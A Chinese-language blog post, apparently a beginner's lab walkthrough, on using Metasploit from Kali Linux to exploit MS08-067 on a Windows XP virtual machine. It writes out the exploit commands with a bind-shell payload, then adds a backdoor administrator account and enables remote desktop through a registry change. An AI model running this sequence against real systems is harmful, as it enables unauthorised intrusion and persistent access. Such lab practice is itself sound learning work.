kali linux&入侵XP系统——MSF初体验

最近我参加了某安全竞赛平台的比赛，开始接触了Metasploit这个渗透神器，同时也是装逼神器（2333….）。下面我将记录一下初步使用Metasploit的过程。

首先，我在百度百科上找到了一段关于Metasploit Framework的简要介绍。Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。在2003年，H.D. Moore发布Metasploit后，计算机安全状况发生了永久性的改变。仿佛一夜之间，任何人都可以成为黑客，每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了，这是因为Metasploit团队一直都在努力开发各种攻击工具，并将它们贡献给所有Metasploit用户。

Metasploit的设计初衷是打造成一个攻击工具开发平台，安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

我用VMware搭建了一个实验环境，下面是网络的拓扑图：

[图略]

我的目标是使用Kali Linux里的Metasploit入侵WinXP，然后从物理机，也就是Win7的远程桌面连进WinXP系统。

首先，在Kali中使用命令msfconsole开启Metasploit。

然后运行如下命令：

use exploit/windows/smb/ms08_067_netapi        #使用MS08067漏洞攻击程序
set LHOST 192.168.116.3                           #设置本地主机IP
set RHOST 192.168.116.116                          #设置目标主机IP
set payload windows/shell_bind_tcp                 #设置payload
show options                                      #查看设置信息
exploit                                            #实施攻击

从图中可以看出，攻击成功，我们得到了一个cmdshell，接下来就是新建账户了。

我添加了一个用户名为zeal，密码为zeal的用户，并将zeal用户添加到管理组。

接下来执行命令netstat -an，查看目标主机开放端口的情况。

发现并没有开启3389（远程桌面连接端口），我们需要手动开启。需要执行命令：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

然后，在物理机（Win7）上运行mstsc进行远程桌面连接。

OK，成功入侵目标主机。

Metasploit就是一款如此强大的工具，使渗透测试人员如虎添翼，只需几个命令就能入侵目标主机。它的强大功能不言而喻。

接下来，我会继续研究Metasploit的使用，并记录自己的学习过程，希望能给各位一定的帮助。